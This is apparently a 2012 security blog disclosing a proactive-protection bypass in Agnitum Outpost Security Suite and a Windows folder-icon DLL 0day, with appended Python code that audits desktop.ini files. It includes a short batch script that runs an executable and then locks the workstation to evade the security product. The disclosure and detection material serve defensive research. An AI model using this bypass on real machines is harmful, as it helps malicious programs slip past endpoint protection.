Sunday, December 23, 2012

Bypass proactive protection in Agnitum Outpost Security Suite. Full video demonstration.

I have previously reported without technical details.

Here is a video demonstration with technical details.

Vulnerable: Agnitum Outpost Security Suite v 7.5.3 (3942.608.1810); other versions may also be affected.
Fixed in version 8.0 (4164.652.1856).

This video demonstration was first shown at the zeroday show (ZeroNights conference 2012).

We can use Windows Lock to bypass proactive protection.

If you want to automate this, use the bat file below:

start 1.exe
ping -n 10 -w 10000 > NULL & rundll32.exe user32.dll,LockWorkStation

Original post in Russian

Thursday, December 20, 2012

Russian researcher found 0day vulnerability on Windows XP\Vista\7

A Russian researcher found a 0day vulnerability in Windows XP\Vista\7 (it doesn't work on Windows 8). This vulnerability has much in common with CVE-2010-2568 (the one Stuxnet used). At this time we do not know whether it is possible to use this vulnerability as an autorun, the way Stuxnet used lnk-files on a USB stick (some people believe it's possible).

The researcher announced only a social-engineering vector. The attacker must give an evil DLL file to the victim, and the victim must select this DLL file as the source of icons for some folder (see image below):

Video demonstration
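For defenders, the folder-icon vector described above can be hunted for after the fact. The following is an added example, not part of the original post or the researcher's material: it audits the text of a `desktop.ini` file and flags icon sources that are DLLs outside the system directory. It assumes the folder icon choice is persisted under `[.ShellClassInfo]` as `IconResource` or `IconFile` (standard Windows folder customization); the function names, `TRUSTED_DIRS` and the sample files are constructed for illustration.

```python
import configparser
import ntpath

# Assumption: icon DLLs under these directories are expected; tune per environment.
TRUSTED_DIRS = (r"%systemroot%\system32", r"c:\windows\system32")
ICON_KEYS = ("iconresource", "iconfile")  # configparser lowercases option names

def icon_sources(desktop_ini_text):
    """Return the icon source paths declared under [.ShellClassInfo]."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       allow_no_value=True, delimiters=("=",))
    try:
        parser.read_string(desktop_ini_text)
    except configparser.Error:
        return []  # not a parsable INI file
    found = []
    for section in parser.sections():
        if section.lower() != ".shellclassinfo":
            continue
        for key in ICON_KEYS:
            value = (parser.get(section, key, fallback="") or "").strip().strip('"')
            if not value:
                continue
            # IconResource is "path,index"; a negative index is a resource id.
            path, sep, index = value.rpartition(",")
            if sep and index.strip().lstrip("-").isdigit():
                value = path.strip()
            found.append(value)
    return found

def is_suspicious(path):
    """True for a DLL icon source that resolves outside the trusted directories."""
    norm = ntpath.normpath(path).lower()  # collapses ..\ segments
    if not norm.endswith(".dll"):
        return False
    return not any(norm.startswith(d + "\\") for d in TRUSTED_DIRS)

def audit(desktop_ini_text):
    """Return the icon sources in one desktop.ini that deserve a closer look."""
    return [p for p in icon_sources(desktop_ini_text) if is_suspicious(p)]

# Constructed samples: a stock system icon and a DLL from a removable drive.
SAMPLE_BENIGN = r"""[.ShellClassInfo]
IconResource=%SystemRoot%\system32\imageres.dll,-183
"""
SAMPLE_FLAGGED = r"""[.ShellClassInfo]
IconFile=E:\docs\icons.dll
IconIndex=0
"""
```

Relative paths and UNC paths are flagged as well, since they never start with a trusted directory.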